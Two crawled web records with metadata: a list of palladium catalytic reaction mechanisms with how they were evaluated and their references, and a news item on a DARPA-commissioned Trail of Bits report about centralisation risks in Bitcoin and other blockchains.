s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948588251.76/warc/CC-MAIN-20171216143011-20171216165011-00466.warc.gz
0.809998
341
CC-MAIN-2017-51
webtext-fineweb__CC-MAIN-2017-51__0__50935285
en
Reaction mechanisms over Palladium

1) Surface reactions: Catalytic combustion of hydrogen on palladium
Evaluation: evaluated by comparison between simulated and experimentally determined catalytic ignition temperatures for stagnation point flows on an electrically heated palladium foil.
Reference: O. Deutschmann, R. Schmidt, F. Behrendt, J. Warnatz, Proc. Combust. Inst. 26 (1996) 1747-1754.

2) Surface reactions: Catalytic oxidation of methane over reduced palladium
Evaluation: evaluated based on experimental, axially space-resolved concentration profiles at steady state for partial and total oxidation of methane within a channel flow reactor over Pd/Al2O3 catalyst at 900-1100 K, 1013 mbar, C/O ratios = 0.8-1.1, 80 vol.-% N2 dilution; comparison with experimentally reported light-off profiles in an annular flow reactor (900-1200 K) under fuel-lean conditions (C/O ratio = 0.125) as well as experimentally reported species concentrations over a Pd-foil catalyst under fuel-rich conditions (C/O ratio = 1.0) at different temperatures (950-1200 K). Surface kinetics is thermodynamically consistent for a temperature range of 273-1400 K.
Reference: H. Stotz, L. Maier, O. Deutschmann, Methane Oxidation over Palladium: On the Mechanism in Fuel-Rich Mixtures at High Temperatures, Topics in Catalysis: Catalysis and Environmental Protection, accepted (2016).
systems_science
https://www.blockchainireland.ie/blockchain-not-as-decentralised-as-first-thought-says-new-report/
2024-03-03T18:21:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476397.24/warc/CC-MAIN-20240303174631-20240303204631-00736.warc.gz
0.947097
282
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__86832181
en
Distributed ledger technology (DLT) and blockchains, including Bitcoin and Ethereum, may be more vulnerable to centralisation risks than initially thought, according to a report from Trail of Bits. Cointelegraph reports that a new report from the security firm titled "Are Blockchains Decentralized?", which was commissioned by the US Defense Advanced Research Projects Agency (DARPA), investigated whether blockchains, like Bitcoin and Ethereum, are truly decentralised, though the report largely focused on Bitcoin. Among its key findings, says Cointelegraph, the security firm found that outdated Bitcoin nodes, unencrypted blockchain mining pools and a majority of unencrypted Bitcoin network traffic traversing over only a limited number of ISPs could leave room for various actors to garner excessive and centralised control over the network. The report states that a subnetwork of Bitcoin nodes is largely responsible for reaching consensus and communicating with miners and that a "vast majority of nodes do not meaningfully contribute to the health of the network." It also found that 21% of Bitcoin nodes are running an older version of the Bitcoin Core client, which is known to have vulnerability concerns such as consensus errors. It states that "it is vital that all DLT nodes operate on the same latest version of software, otherwise, consensus errors can occur and lead to a blockchain fork."
systems_science